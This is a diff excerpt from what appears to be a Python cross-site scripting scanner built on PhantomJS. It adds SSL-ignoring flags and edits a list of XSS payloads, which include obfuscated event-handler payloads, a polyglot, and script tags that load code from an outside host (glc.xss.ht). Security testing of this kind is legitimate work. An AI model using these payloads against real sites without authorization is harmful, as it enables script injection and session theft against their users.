| skipped 208 lines |
209 | 209 | | if not os.path.isfile(_phantom): |
210 | 210 | | parser.error( 'phantomjs not found!' ) |
211 | 211 | | # _phantom_cmd = _phantom + ' ' + os.path.dirname(os.path.realpath(__file__)) + '/phantom-xss.js' |
212 | | - | _phantom_cmd = _phantom + ' --load-images=false ' + os.path.dirname(os.path.realpath(__file__)) + '/phantom-xss.js' |
| 212 | + | _phantom_cmd = _phantom + ' --ignore-ssl-errors=true --ssl-protocol=any --load-images=false ' + os.path.dirname(os.path.realpath(__file__)) + '/phantom-xss.js' |
213 | 213 | | # _phantom_cmd = _phantom + ' ' + os.path.dirname(os.path.realpath(__file__)) + '/puppeteer-xss.js' |
214 | 214 | | # print( _phantom_cmd ) |
215 | 215 | | |
| skipped 80 lines |
296 | 296 | | # source: https://twitter.com/brutelogic/status/1138805808328839170 |
297 | 297 | | if not n_payloads: |
298 | 298 | | t_payloads = [ |
299 | | - | '\'"--><sVg onload=prompt(1)>', |
300 | 299 | | '\'"--><a autofocus onfocus=prompt(1) href=?>.', |
301 | 300 | | '\'"--></sCrIpt><sCRIpt>prompt(1)</SCript>', |
302 | 301 | | '\'"--><svG><scRIpt href=data:,prompt(1) />', |
| skipped 2 lines |
305 | 304 | | "'\")];*/prompt(1);/*", |
306 | 305 | | '" onload=prompt(1)>', |
307 | 306 | | '\'"--><SCripT src="//glc.xss.ht">', |
| 307 | + | '\'"--><SCripT src=https://glc.xss.ht>', |
308 | 308 | | '\'"--><sCRipt src=javascript:[1].find(prompt)>', |
309 | | - | "'\"--><x v-on=_c.constructor('prompt(1)')()>", |
| 309 | + | "'\"--><sVg/OnLuFy=\"X=y\"oNloaD=;1^confirm(1)>/``^1//", |
| 310 | + | "javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/\"/+/onmouseover=1/+/[*/[]/+alert(1)//'>", |
310 | 311 | | ] |
311 | 312 | | n_payloads = len(t_payloads) |
312 | 313 | | |
| skipped 99 lines |